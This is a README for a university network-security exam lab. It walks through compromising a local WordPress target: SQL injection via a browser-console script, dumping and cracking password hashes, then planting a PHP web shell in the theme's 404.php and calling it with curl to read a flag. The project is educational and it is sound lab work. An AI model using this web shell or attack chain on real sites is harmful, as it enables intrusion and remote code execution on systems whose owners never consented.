Progetto per l'esame di Network Security di Dotani, Ferrara, Forino, Galateo
- Connect to the Kali shell using the dsp.
- Enable VNC by running the script at
/home/vnc.sh. - Connect to the GUI using a VNC viewer.
- Use Kali's browser to browse to the target at IP address
193.20.1.4. - Use the unknown mode.
- Answer "Yes" to the poll.
- Open the script at
/home/sql_inj_script.jswith a text editor. - Copy/paste the first part of the script into the browser's console.
- After the page reloads, you will see an error in the console.
- Copy/paste the second part of the script into the console, and you will get the users list in the console.
- Repeat with the 3rd and 4th parts of the script to get the hashes list in the browser's console.
- Copy the hash from the console and paste it into the
hash.txtfile in the/homedirectory. - Open the terminal and run the following commands:
cd /home ./discover_psw.sh - You will find the matched
hash:pwdin thecracked.txtfile. - Log in to the following URL:
http://193.20.1.4/wp-login.php. - Open the theme editor and edit the page
404.phpof thetwentytwentytheme. - Overwrite all the code with the following:
<?php system($_GET['cmd']); - Call the following URL for remote code execution (you can run any shell command by passing it after the
cmdparameter in the URL):curl -X GET "http://193.20.1.4/wp-content/themes/<themename>/404.php?cmd=cat%20flag.txt"
- Install Docker
- Clone the repository.
- Run the following
docker compose up
This project is licensed under the MIT License - see the LICENSE file for details.